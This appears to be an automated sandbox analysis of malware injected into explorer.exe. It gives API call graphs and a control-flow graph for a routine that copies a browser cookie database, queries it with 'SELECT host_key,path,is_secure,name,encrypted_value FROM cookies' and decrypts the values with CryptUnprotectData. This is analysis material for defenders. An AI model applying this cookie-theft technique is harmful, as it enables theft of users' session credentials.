API calls 29888 299742e 24 API calls 29891 297482b 14 API calls 29892 29ae024 93 API calls 29894 29b7452 19 API calls 29369 297105d VirtualFree 29772 2975e5a 28 API calls 29498 2973c40 29499 2971b6a 2 API calls 29498->29499 29500 2973c50 29499->29500 29501 2973dfa 29500->29501 29534 2971000 GetProcessHeap RtlAllocateHeap 29500->29534 29503 2973c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 29504 29c4bec 89 API calls 29503->29504 29507 2973c9a 29504->29507 29505 2973dec DeleteFileW 29506 2971011 3 API calls 29505->29506 29506->29501 29507->29505 29508 2973de3 29507->29508 29535 2971000 GetProcessHeap RtlAllocateHeap 29507->29535 29509 29c3848 76 API calls 29508->29509 29509->29505 29511 2973cce 29536 29902ec 107 API calls 29511->29536 29513 2973da8 29539 298fb92 93 API calls 29513->29539 29515 2973db1 lstrlen 29516 2973ddc 29515->29516 29517 2973db9 29515->29517 29518 2971011 3 API calls 29516->29518 29540 2971798 lstrlen 29517->29540 29518->29508 29519 2971fa7 19 API calls 29528 2973cd9 29519->29528 29521 2973dc8 29541 2971798 lstrlen 29521->29541 29522 2973d2b lstrlen 29525 2973d35 lstrlen 29522->29525 29522->29528 29524 2973dd2 29542 2971798 lstrlen 29524->29542 29525->29528 29528->29513 29528->29519 29528->29522 29537 2971000 GetProcessHeap RtlAllocateHeap 29528->29537 29538 29902ec 107 API calls 29528->29538 29530 2973d46 wsprintfA lstrlen 29531 2973d83 lstrcat 29530->29531 29532 2973d71 29530->29532 29533 2971011 3 API calls 29531->29533 29532->29531 29533->29528 29534->29503 29535->29511 29536->29528 29537->29530 29538->29528 29539->29515 29540->29521 29541->29524 29542->29516 29896 2974440 24 API calls 29898 2996440 107 API calls 29775 29d9238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 29900 29c507d 24 API calls 29901 298807c 23 API calls 29778 2990670 _allmul _allmul _allmul _alldvrm 29904 297b079 20 API calls 29779 29a3e6b 20 API calls 29908 298f86a 31 API calls 29910 2974c6d 17 API calls 29911 29b2864 25 API calls 29201 297639e 29205 297b1e5 29201->29205 29225 297b1e3 29201->29225 29202 29763b2 29206 297b214 29205->29206 29207 297b20d 29205->29207 29209 297b233 29206->29209 29212 297b28f 29206->29212 29279 297ae65 29206->29279 29261 297aeea 29207->29261 29209->29212 29245 297a7ae 29209->29245 29212->29202 29213 297b2d6 29258 2976a5a 29213->29258 29218 297b2e8 29218->29212 29221 297b310 CreateFileMappingW 29218->29221 29220 297b26d 29285 297a1c6 18 API calls 29220->29285 29222 297b37e 29221->29222 29223 297b32b MapViewOfFile 29221->29223 29286 297a1c6 18 API calls 29222->29286 29223->29218 29223->29222 29226 297b1e5 29225->29226 29227 297b214 29226->29227 29228 297aeea 27 API calls 29226->29228 29229 297b233 29227->29229 29230 297ae65 22 API calls 29227->29230 29232 297b28f 29227->29232 29228->29227 29231 297a7ae 18 API calls 29229->29231 29229->29232 29230->29229 29236 297b267 29231->29236 29232->29202 29233 297b26d 29359 297a1c6 18 API calls 29233->29359 29234 297b2d6 29235 2976a5a 17 API calls 29234->29235 29237 297b2e8 29235->29237 29236->29232 29236->29233 29236->29234 29239 297a67c 22 API calls 29236->29239 29237->29232 29241 297b310 CreateFileMappingW 29237->29241 29240 297b2be 29239->29240 29240->29233 29240->29234 29242 297b32b MapViewOfFile 29241->29242 29243 297b37e 29241->29243 29242->29237 29242->29243 29360 297a1c6 18 API calls 29243->29360 29247 297a7c7 29245->29247 29246 297a805 29246->29212 29246->29213 29246->29220 29249 297a67c 29246->29249 29247->29246 29287 297a1c6 18 API calls 29247->29287 29250 297a694 _alldiv _allmul 29249->29250 29251 297a6c1 29249->29251 29250->29251 29288 297a33b SetFilePointer 29251->29288 29254 297a6d4 29257 297a6ee 29254->29257 29292 297a1c6 18 API calls 29254->29292 29255 297a6f0 SetEndOfFile 29255->29254 29255->29257 29257->29213 29257->29220 29259 29c307c 17 API calls 29258->29259 29260 2976a65 29259->29260 29260->29218 29294 2976a81 29261->29294 29263 297af01 29264 2976a81 memset 29263->29264 29274 297af07 29263->29274 29265 297af2a 29264->29265 29265->29274 29298 2977f07 29265->29298 29267 297af54 29267->29274 29301 29c52ae 29267->29301 29271 297affa 29272 297b020 29271->29272 29273 297b000 29271->29273 29275 297ae65 22 API calls 29272->29275 29325 297a1c6 18 API calls 29273->29325 29274->29206 29277 297b01c 29275->29277 29277->29274 29320 297adcc 29277->29320 29280 297ae7a 29279->29280 29281 297ae83 29280->29281 29282 297a67c 22 API calls 29280->29282 29281->29209 29283 297aea5 29282->29283 29283->29281 29358 297a1c6 18 API calls 29283->29358 29285->29212 29286->29212 29287->29246 29289 297a36a 29288->29289 29291 297a390 29288->29291 29289->29291 29293 297a1c6 18 API calls 29289->29293 29291->29254 29291->29255 29292->29257 29293->29291 29295 2976a8f 29294->29295 29296 2976a95 memset 29295->29296 29297 2976aa4 29295->29297 29296->29297 29297->29263 29326 2977ec7 29298->29326 29302 29c52bb 29301->29302 29303 297afd9 29302->29303 29331 29aba08 _allmul 29302->29331 29305 297b87b 29303->29305 29306 297b88d memset 29305->29306 29313 297b8e5 29306->29313 29309 297ba3c 29309->29271 29310 297b965 CreateFileW 29310->29313 29313->29306 29313->29309 29313->29310 29314 297ba14 29313->29314 29315 297ba41 29313->29315 29332 297b609 29313->29332 29335 297b64b 18 API calls 29313->29335 29336 297bb9f 18 API calls 29313->29336 29337 297a2aa 17 API calls 29313->29337 29338 297a1c6 18 API calls 29314->29338 29319 29c52ae _allmul 29315->29319 29317 297ba32 29339 29c4db2 17 API calls 29317->29339 29319->29309 29324 297ade4 29320->29324 29321 297ae5f 29321->29274 29324->29321 29344 297bafc 29324->29344 29355 297a39e 18 API calls 29324->29355 29325->29277 29327 2977ed9 29326->29327 29329 2977ed4 29326->29329 29330 2976e6a 17 API calls 29327->29330 29329->29267 29330->29329 29331->29303 29340 297a08a 29332->29340 29334 297b60f 29334->29313 29335->29313 29336->29313 29337->29313 29338->29317 29339->29309 29341 297a0a4 29340->29341 29342 2976a81 memset 29341->29342 29343 297a0aa 29341->29343 29342->29343 29343->29334 29345 297b609 memset 29344->29345 29346 297bb14 29345->29346 29347 297bb3f GetFileAttributesW 29346->29347 29349 297bb25 DeleteFileW 29346->29349 29350 297bb5b 29346->29350 29354 297bb1a 29346->29354 29347->29346 29348 297bb4b 29347->29348 29348->29350 29351 297bb7d 29348->29351 29349->29346 29349->29351 29356 297a1c6 18 API calls 29350->29356 29357 297a2aa 17 API calls 29351->29357 29354->29324 29355->29324 29356->29354 29357->29354 29358->29281 29359->29232 29360->29232 29785 298cb91 18 API calls 29361 2971b9d 29362 2971ba2 29361->29362 29363 2971bc1 29361->29363 29362->29363 29364 2971ba9 GetFileAttributesW 29362->29364 29365 2971bb5 29364->29365 29786 29913ca 103 API calls 29787 297bf9a _alldiv 29913 2971198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 29914 298fd97 19 API calls 29915 2997d8b _allrem memcpy 29789 298ab8b 19 API calls 29916 2999dbc 25 API calls 29793 29b33b7 27 API calls 29794 29b53ad memset memcpy memset memcpy 29918 29811a0 43 API calls 29795 2998ba6 7 API calls 29366 29763dd 29368 297b87b 21 API calls 29366->29368 29367 29763f4 29368->29367 29370 29715dd 29371 29715f3 lstrlen 29370->29371 29372 2971600 29370->29372 29371->29372 29381 2971000 GetProcessHeap RtlAllocateHeap 29372->29381 29374 2971608 lstrcat 29375 2971644 29374->29375 29376 297163d lstrcat 29374->29376 29382 2971333 29375->29382 29376->29375 29379 2971011 3 API calls 29380 2971667 29379->29380 29381->29374 29405 2971000 GetProcessHeap RtlAllocateHeap 29382->29405 29384 2971357 29406 297106c lstrlen MultiByteToWideChar 29384->29406 29386 2971366 29407 29712a3 RtlZeroMemory 29386->29407 29389 29713b8 RtlZeroMemory 29393 29713ed 29389->29393 29390 2971011 3 API calls 29391 29715d2 29390->29391 29391->29379 29392 29715b5 29392->29390 29393->29392 29409 2971000 GetProcessHeap RtlAllocateHeap 29393->29409 29395 29714a7 wsprintfW 29397 29714c9 29395->29397 29396 29715a1 29398 2971011 3 API calls 29396->29398 29397->29396 29410 2971000 GetProcessHeap RtlAllocateHeap 29397->29410 29398->29392 29400 2971533 29401 297159a 29400->29401 29411 297104c VirtualAlloc 29400->29411 29403 2971011 3 API calls 29401->29403 29403->29396 29404 297158a RtlMoveMemory 29404->29401 29405->29384 29406->29386 29408 29712c5 29407->29408 29408->29389 29408->29392 29409->29395 29410->29400 29411->29404 29417 29743d9 29424 2974317 _alloca_probe RegOpenKeyW 29417->29424 29420 2974317 25 API calls 29421 29743f5 29420->29421 29422 2974317 25 API calls 29421->29422 29423 2974403 29422->29423 29425 2974343 RegEnumKeyExW 29424->29425 29426 29743cf 29424->29426 29427 29743c4 RegCloseKey 29425->29427 29428 297436d 29425->29428 29426->29420 29427->29426 29429 2971953 6 API calls 29428->29429 29430 297199d 9 API calls 29428->29430 29432 2971011 3 API calls 29428->29432 29435 297418a 16 API calls 29428->29435 29429->29428 29430->29428 29433 297439b RegEnumKeyExW 29432->29433 29433->29428 29434 29743c3 29433->29434 29434->29427 29435->29428 29797 297ebd9 37 API calls 29798 29913ca 103 API calls 29922 29c3dc8 24 API calls 29803 29a73c4 22 API calls 29567 2979fc8 29568 2979fd3 29567->29568 29570 2979fd8 29567->29570 29569 2979ff4 HeapCreate 29569->29568 29571 297a004 29569->29571 29570->29568 29570->29569 29573 2977f70 17 API calls 29571->29573 29573->29568 29923 297d1f7 memset _allmul _allmul 29924 29749f1 13 API calls 29805 2989ff0 32 API calls 29639 29747fa 29646 297479c 29639->29646 29642 297479c 23 API calls 29643 2974813 29642->29643 29644 297479c 23 API calls 29643->29644 29645 297481f 29644->29645 29647 2971afe 10 API calls 29646->29647 29648 29747af 29647->29648 29649 29747f1 29648->29649 29650 297199d 9 API calls 29648->29650 29649->29642 29651 29747bf 29650->29651 29652 29747ea 29651->29652 29654 2971d4a 18 API calls 29651->29654 29653 2971011 3 API calls 29652->29653 29653->29649 29654->29651 29808 29913ca 102 API calls 29926 29799e1 strncmp 29927 29c55eb IsProcessorFeaturePresent 29810 2997be1 29 API calls 29929 297c9ea _allmul _alldiv 28868 2973717 28918 2971b6a 28868->28918 28870 2973c23 28871 297372e 28871->28870 28924 2971000 GetProcessHeap RtlAllocateHeap 28871->28924 28873 297376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28874 297379e 28873->28874 28875 29737a8 28873->28875 28941 297349b 31 API calls 28874->28941 28925 29c4bec 28875->28925 28878 2973c15 DeleteFileW 28936 2971011 28878->28936 28880 29737b3 28880->28878 28881 2973c0c 28880->28881 28942 2971000 GetProcessHeap RtlAllocateHeap 28880->28942 28952 29c3848 28881->28952 28884 29737e3 28943 29902ec 107 API calls 28884->28943 28886 2973bcc 28948 298fb92 93 API calls 28886->28948 28888 2973bd9 lstrlen 28889 2973c05 28888->28889 28890 2973be5 28888->28890 28891 2971011 3 API calls 28889->28891 28949 2971798 lstrlen 28890->28949 28891->28881 28893 2973a37 CryptUnprotectData 28900 29737ee 28893->28900 28894 2973833 RtlCompareMemory 28894->28893 28894->28900 28896 2973bf3 28950 2971798 lstrlen 28896->28950 28898 2973bfc 28951 2971798 lstrlen 28898->28951 28900->28886 28900->28893 28900->28894 28901 2973867 RtlZeroMemory 28900->28901 28903 2971011 3 API calls 28900->28903 28904 2973b0f lstrlen 28900->28904 28906 2971000 GetProcessHeap RtlAllocateHeap 28900->28906 28907 2971fa7 19 API calls 28900->28907 28908 2973987 lstrlen 28900->28908 28912 2973ba3 lstrcat 28900->28912 28945 2972112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28900->28945 28946 2972112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28900->28946 28947 29902ec 107 API calls 28900->28947 28944 2971000 GetProcessHeap RtlAllocateHeap 28901->28944 28903->28900 28904->28900 28905 2973b21 lstrlen 28904->28905 28905->28900 28906->28900 28907->28900 28908->28900 28911 2973999 lstrlen 28908->28911 28910 2973b66 wsprintfA lstrlen 28910->28900 28910->28912 28911->28900 28912->28900 28914 29739de wsprintfA lstrlen 28915 2973a0d 28914->28915 28916 2973a1b lstrcat 28914->28916 28915->28916 28917 2971011 3 API calls 28916->28917 28917->28900 28919 2971b6f 28918->28919 28920 2971b99 28918->28920 28919->28920 28921 2971b76 CreateFileW 28919->28921 28920->28871 28922 2971b95 28921->28922 28923 2971b8d CloseHandle 28921->28923 28922->28871 28923->28922 28924->28873 28955 29c307c 28925->28955 28927 29c4c01 28928 29c4c44 28927->28928 28965 298c54d memset 28927->28965 28928->28880 28930 29c4c18 28966 298c871 21 API calls 28930->28966 28932 29c4c2a 28967 298c518 19 API calls 28932->28967 28934 29c4c33 28934->28928 28968 29c486f 89 API calls 28934->28968 28990 2971162 VirtualQuery 28936->28990 28939 297102d 28939->28870 28940 297101d GetProcessHeap RtlFreeHeap 28940->28939 28941->28875 28942->28884 28943->28900 28944->28900 28945->28914 28946->28910 28947->28900 28948->28888 28949->28896 28950->28898 28951->28889 28992 29c37cb 28952->28992 28956 29c3095 28955->28956 28964 29c308e 28955->28964 28957 29c30ad 28956->28957 28982 29766ce 17 API calls 28956->28982 28959 29c30ed memset 28957->28959 28957->28964 28960 29c3108 28959->28960 28961 29c3116 28960->28961 28983 297c59d 17 API calls 28960->28983 28961->28964 28969 2976512 28961->28969 28964->28927 28965->28930 28966->28932 28967->28934 28968->28928 28984 297685c 28969->28984 28971 297651d 28971->28964 28972 2976519 28972->28971 28973 297bfec GetSystemInfo 28972->28973 28987 29765bd 28973->28987 28975 297c00e 28976 29765bd 16 API calls 28975->28976 28977 297c01a 28976->28977 28978 29765bd 16 API calls 28977->28978 28979 297c026 28978->28979 28980 29765bd 16 API calls 28979->28980 28981 297c032 28980->28981 28981->28964 28982->28957 28983->28961 28985 29c307c 17 API calls 28984->28985 28986 2976861 28985->28986 28986->28972 28988 29c307c 17 API calls 28987->28988 28989 29765c2 28988->28989 28989->28975 28991 2971019 28990->28991 28991->28939 28991->28940 28993 29c37d6 28992->28993 29003 29c37e9 28992->29003 29004 29795b5 17 API calls 28993->29004 28995 29c37db 28996 29c37df 28995->28996 28998 29c37eb 28995->28998 29005 29c4da0 17 API calls 28996->29005 28999 29c3834 28998->28999 29001 29c381f 28998->29001 29007 29c3865 71 API calls 28999->29007 29006 2978795 22 API calls 29001->29006 29003->28878 29004->28995 29005->29003 29006->29003 29007->29003 29008 2972b15 29033 2971953 29008->29033 29010 2972b1f FindFirstFileW 29012 2972c5c 29010->29012 29020 2972b4e 29010->29020 29013 2971011 3 API calls 29012->29013 29014 2972c63 29013->29014 29016 2971011 3 API calls 29014->29016 29015 2972b59 lstrcmpiW 29018 2972b71 lstrcmpiW 29015->29018 29019 2972c3d FindNextFileW 29015->29019 29022 2972c6a 29016->29022 29017 2971953 6 API calls 29017->29020 29018->29019 29018->29020 29019->29020 29021 2972c51 FindClose 29019->29021 29020->29015 29020->29017 29023 297199d 9 API calls 29020->29023 29032 2971011 3 API calls 29020->29032 29038 29719b4 29020->29038 29042 297199d 29020->29042 29021->29012 29025 2972bdf StrStrIW 29023->29025 29026 2972bf1 29025->29026 29027 2972c10 StrStrIW 29025->29027 29026->29027 29028 2971cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 29026->29028 29029 2971011 3 API calls 29026->29029 29047 297278e 41 API calls 29026->29047 29027->29026 29028->29026 29029->29019 29032->29020 29034 2971964 lstrlenW lstrlenW 29033->29034 29048 2971000 GetProcessHeap RtlAllocateHeap 29034->29048 29037 2971986 lstrcatW lstrcatW 29037->29010 29039 29719bc 29038->29039 29041 29719d4 29038->29041 29040 29719c3 lstrlenW 29039->29040 29039->29041 29040->29041 29041->29020 29043 2971953 6 API calls 29042->29043 29044 29719a6 29043->29044 29045 2971011 3 API calls 29044->29045 29046 29719af 29045->29046 29046->29020 29047->29027 29048->29037 29930 29884a7 30 API calls 29813 29913ca 105 API calls 29412 297411b 29413 2974045 50 API calls 29412->29413 29414 297412b 29413->29414 29415 2974045 50 API calls 29414->29415 29416 297413b 29415->29416 29814 2996b14 memset memcpy _allmul 29815 2995f08 113 API calls 29543 29d9304 29544 29d9344 29543->29544 29545 29d94da LoadLibraryA 29544->29545 29548 29d951f VirtualProtect VirtualProtect 29544->29548 29549 29d9584 29544->29549 29546 29d94f1 29545->29546 29546->29544 29550 29d9503 GetProcAddress 29546->29550 29548->29549 29549->29549 29550->29546 29551 29d9519 29550->29551 29818 29a6f06 24 API calls 29574 2974108 29575 2974045 50 API calls 29574->29575 29576 2974118 29575->29576 29821 2987b3d 18 API calls 29823 2980f3e 60 API calls 29935 299f130 22 API calls 29824 298ff32 21 API calls 29936 2989534 39 API calls 29937 2980128 36 API calls 29940 2979925 18 API calls 29827 29a072d 19 API calls 29828 29bc322 27 API calls 29829 297cb2a _allmul _allmul 29942 299e558 22 API calls 29049 2974151 29052 2974045 29049->29052 29071 2973fdc 29052->29071 29055 2973fdc 50 API calls 29056 297407a 29055->29056 29057 2973fdc 50 API calls 29056->29057 29058 297408d 29057->29058 29059 2973fdc 50 API calls 29058->29059 29060 29740a0 29059->29060 29061 2973fdc 50 API calls 29060->29061 29062 29740b3 29061->29062 29063 2973fdc 50 API calls 29062->29063 29064 29740c6 29063->29064 29065 2973fdc 50 API calls 29064->29065 29066 29740d9 29065->29066 29067 2973fdc 50 API calls 29066->29067 29068 29740ec 29067->29068 29069 2973fdc 50 API calls 29068->29069 29070 29740ff 29069->29070 29082 2971afe 29071->29082 29073 297403f 29073->29055 29075 297199d 9 API calls 29076 2973ff8 29075->29076 29090 2973ed9 29076->29090 29080 2974038 29081 2971011 3 API calls 29080->29081 29081->29073 29140 2971000 GetProcessHeap RtlAllocateHeap 29082->29140 29084 2971b0d SHGetFolderPathW 29085 2971b63 29084->29085 29086 2971b20 29084->29086 29085->29073 29085->29075 29087 2971011 3 API calls 29086->29087 29089 2971b28 29087->29089 29089->29085 29141 29719e5 29089->29141 29091 2973fd1 29090->29091 29092 2973eed 29090->29092 29091->29080 29112 2971d4a 29091->29112 29092->29091 29156 2971000 GetProcessHeap RtlAllocateHeap 29092->29156 29094 2973f01 PathCombineW FindFirstFileW 29095 2973f27 29094->29095 29096 2973fca 29094->29096 29097 2973f32 lstrcmpiW 29095->29097 29098 2973f78 lstrcmpiW 29095->29098 29157 2971000 GetProcessHeap RtlAllocateHeap 29095->29157 29099 2971011 3 API calls 29096->29099 29100 2973f42 lstrcmpiW 29097->29100 29101 2973faf FindNextFileW 29097->29101 29098->29095 29098->29101 29099->29091 29100->29101 29104 2973f56 29100->29104 29101->29095 29103 2973fc3 FindClose 29101->29103 29103->29096 29174 2971000 GetProcessHeap RtlAllocateHeap 29104->29174 29105 2973f92 PathCombineW 29158 2973e04 29105->29158 29108 2973f60 PathCombineW 29110 2973ed9 23 API calls 29108->29110 29109 2973f76 29111 2971011 3 API calls 29109->29111 29110->29109 29111->29101 29113 2971eb4 29112->29113 29114 2971d62 29112->29114 29113->29080 29114->29113 29115 29719b4 lstrlenW 29114->29115 29116 2971d73 29115->29116 29117 2971d8b 29116->29117 29118 2971d79 29116->29118 29120 2971953 6 API calls 29117->29120 29119 2971953 6 API calls 29118->29119 29121 2971d83 29119->29121 29120->29121 29121->29113 29122 2971da3 FindFirstFileW 29121->29122 29123 2971ead 29122->29123 29130 2971dba 29122->29130 29124 2971011 3 API calls 29123->29124 29124->29113 29125 2971dc5 lstrcmpiW 29127 2971e8e FindNextFileW 29125->29127 29128 2971ddd lstrcmpiW 29125->29128 29126 2971953 6 API calls 29126->29130 29129 2971ea2 FindClose 29127->29129 29127->29130 29128->29127 29136 2971df5 29128->29136 29129->29123 29130->29125 29130->29126 29132 297199d 9 API calls 29130->29132 29131 29719b4 lstrlenW 29131->29136 29133 2971e54 lstrcmpiW 29132->29133 29133->29136 29135 2971011 3 API calls 29135->29127 29136->29131 29136->29135 29137 2971953 6 API calls 29136->29137 29138 297199d 9 API calls 29136->29138 29139 2971d4a 12 API calls 29136->29139 29200 2971cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 29136->29200 29137->29136 29138->29136 29139->29136 29140->29084 29142 29719f7 29141->29142 29143 29719fa RegOpenKeyExW 29141->29143 29142->29143 29144 2971aa2 29143->29144 29145 2971a28 RegQueryValueExW 29143->29145 29148 2971ab9 29144->29148 29149 29719e5 5 API calls 29144->29149 29146 2971a46 29145->29146 29147 2971a94 RegCloseKey 29145->29147 29146->29147 29155 2971000 GetProcessHeap RtlAllocateHeap 29146->29155 29147->29144 29147->29148 29148->29089 29149->29148 29151 2971a61 RegQueryValueExW 29152 2971a7f 29151->29152 29153 2971a8b 29151->29153 29152->29147 29154 2971011 3 API calls 29153->29154 29154->29152 29155->29151 29156->29094 29157->29105 29159 2971b6a 2 API calls 29158->29159 29160 2973e0f 29159->29160 29171 2973ec7 29160->29171 29175 2971c31 CreateFileW 29160->29175 29167 2973ebf 29168 2971011 3 API calls 29167->29168 29168->29171 29169 2973e6c RtlCompareMemory 29170 2973ea8 29169->29170 29172 2973e7e CryptUnprotectData 29169->29172 29173 2971011 3 API calls 29170->29173 29171->29109 29172->29170 29173->29167 29174->29108 29176 2971c53 GetFileSize 29175->29176 29177 2971c98 29175->29177 29178 2971c63 29176->29178 29179 2971c90 CloseHandle 29176->29179 29177->29171 29185 2972fb1 29177->29185 29197 2971000 GetProcessHeap RtlAllocateHeap 29178->29197 29179->29177 29181 2971c6b ReadFile 29182 2971c80 29181->29182 29182->29179 29183 2971011 3 API calls 29182->29183 29184 2971c8e 29183->29184 29184->29179 29186 2972ff2 29185->29186 29187 2972fb8 StrStrIA 29185->29187 29186->29171 29191 297123b lstrlen 29186->29191 29187->29186 29188 2972fcd lstrlen StrStrIA 29187->29188 29188->29186 29189 2972fe7 29188->29189 29198 297190b 6 API calls 29189->29198 29192 2971256 CryptStringToBinaryA 29191->29192 29193 297129b 29191->29193 29192->29193 29194 2971272 29192->29194 29193->29167 29193->29169 29193->29170 29199 2971000 GetProcessHeap RtlAllocateHeap 29194->29199 29196 297127e CryptStringToBinaryA 29196->29193 29197->29181 29198->29186 29199->29196 29200->29136 29943 297a558 18 API calls 29833 298f74d 18 API calls 29944 299e141 18 API calls 29834 2996340 92 API calls 29577 2972f77 29578 2972e30 22 API calls 29577->29578 29579 2972f9a 29578->29579 29580 2972e30 22 API calls 29579->29580 29581 2972fab 29580->29581 29948 298c97b memcpy 29950 29a5d6f 20 API calls 29951 298a16f 33 API calls 29837 29a7762 memset memset memcpy 29838 2997f67 24 API calls 29839 297ab68 22 API calls

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 2973717-2973730 call 2971b6a 3 2973c37-2973c3d 0->3 4 2973736-297374c 0->4 5 2973762-297379c call 2971000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 4->5 6 297374e-297375e call 297302d 4->6 11 297379e-29737a3 call 297349b 5->11 12 29737a8-29737b5 call 29c4bec 5->12 6->5 11->12 16 2973c15-2973c1e DeleteFileW call 2971011 12->16 17 29737bb-29737d3 call 29aeeb8 12->17 21 2973c23-2973c28 16->21 22 2973c0c-2973c10 call 29c3848 17->22 23 29737d9-29737f1 call 2971000 call 29902ec 17->23 21->3 24 2973c2a-2973c32 call 2972ffa 21->24 22->16 31 29737f7 23->31 32 2973bd0-2973be3 call 298fb92 lstrlen 23->32 24->3 34 29737fc-2973816 call 2971fa7 31->34 37 2973c05-2973c07 call 2971011 32->37 38 2973be5-2973c00 call 2971798 * 3 32->38 40 2973bb6-2973bc6 call 29902ec 34->40 41 297381c-297382d 34->41 37->22 38->37 40->34 54 2973bcc 40->54 44 2973a37-2973a51 CryptUnprotectData 41->44 45 2973833-2973843 RtlCompareMemory 41->45 44->40 50 2973a57-2973a5c 44->50 45->44 48 2973849-297384b 45->48 48->44 53 2973851-2973856 48->53 50->40 55 2973a62-2973a78 call 2971fa7 50->55 53->44 58 297385c-2973861 53->58 54->32 61 2973a86-2973a9d call 2971fa7 55->61 62 2973a7a-2973a80 55->62 58->44 60 2973867-29738ed RtlZeroMemory call 2971000 58->60 73 29738f3-2973909 call 2971fa7 60->73 74 2973a2e-2973a32 60->74 68 2973a9f-2973aa5 61->68 69 2973aab-2973ac2 call 2971fa7 61->69 62->61 64 2973a82 62->64 64->61 68->69 71 2973aa7 68->71 79 2973ac4-2973aca 69->79 80 2973ad0-2973aed call 2971fa7 69->80 71->69 83 2973917-297392d call 2971fa7 73->83 84 297390b-2973911 73->84 77 2973bb1 call 2971011 74->77 77->40 79->80 82 2973acc 79->82 90 2973af7-2973b01 80->90 91 2973aef-2973af1 80->91 82->80 92 297392f-2973935 83->92 93 297393b-2973952 call 2971fa7 83->93 84->83 88 2973913 84->88 88->83 95 2973b03-2973b05 90->95 96 2973b0f-2973b1b lstrlen 90->96 91->90 94 2973af3 91->94 92->93 97 2973937 92->97 103 2973954-297395a 93->103 104 2973960-2973979 call 2971fa7 93->104 94->90 95->96 99 2973b07-2973b0b 95->99 96->40 100 2973b21-2973b2a lstrlen 96->100 97->93 99->96 100->40 102 2973b30-2973b4f call 2971000 100->102 110 2973b51 102->110 111 2973b59-2973b93 call 2972112 wsprintfA lstrlen 102->111 103->104 106 297395c 103->106 112 2973987-2973993 lstrlen 104->112 113 297397b-2973981 104->113 106->104 110->111 119 2973b95-2973ba1 call 297102f 111->119 120 2973ba3-2973baf lstrcat 111->120 112->74 117 2973999-29739a2 lstrlen 112->117 113->112 115 2973983 113->115 115->112 117->74 118 29739a8-29739c7 call 2971000 117->118 125 29739d1-2973a0b call 2972112 wsprintfA lstrlen 118->125 126 29739c9 118->126 119->120 120->77 129 2973a0d-2973a19 call 297102f 125->129 130 2973a1b-2973a29 lstrcat call 2971011 125->130 126->125 129->130 130->74
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
                                                                                                                            • Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F
                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000), ref: 02973778
                                                                                                                          • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02973782
                                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 02973789
                                                                                                                          • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02973794
                                                                                                                          • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0297383B
                                                                                                                          • RtlZeroMemory.NTDLL(?,00000040), ref: 02973870
                                                                                                                          • lstrlen.KERNEL32(?,?,?,?,?), ref: 0297398B
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 0297399A
                                                                                                                          • wsprintfA.USER32 ref: 029739F1
                                                                                                                          • lstrlen.KERNEL32(00000000,?,?), ref: 029739FD
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02973A21
                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02973A49
                                                                                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02973B13
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02973B22
                                                                                                                          • wsprintfA.USER32 ref: 02973B79
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02973B85
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02973BA9
                                                                                                                          • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02973BDA
                                                                                                                          • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02973C16
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                          • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                          • API String ID: 584740257-404540950
                                                                                                                          • Opcode ID: a9481d6fd8efb8192b50eb3afc5d62e80f01da3d9f0a2b6ab6cfae69f33cbbb2
                                                                                                                          • Instruction ID: 1b79dffd7c12d7182bf87acdd174893b312c5202b81669625622658e54462d20
                                                                                                                          • Opcode Fuzzy Hash: a9481d6fd8efb8192b50eb3afc5d62e80f01da3d9f0a2b6ab6cfae69f33cbbb2
                                                                                                                          • Instruction Fuzzy Hash: B1E18771608341AFD725EF25C890A3FBBEEAFC9748F14486CF88996290DB35C805DB56

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
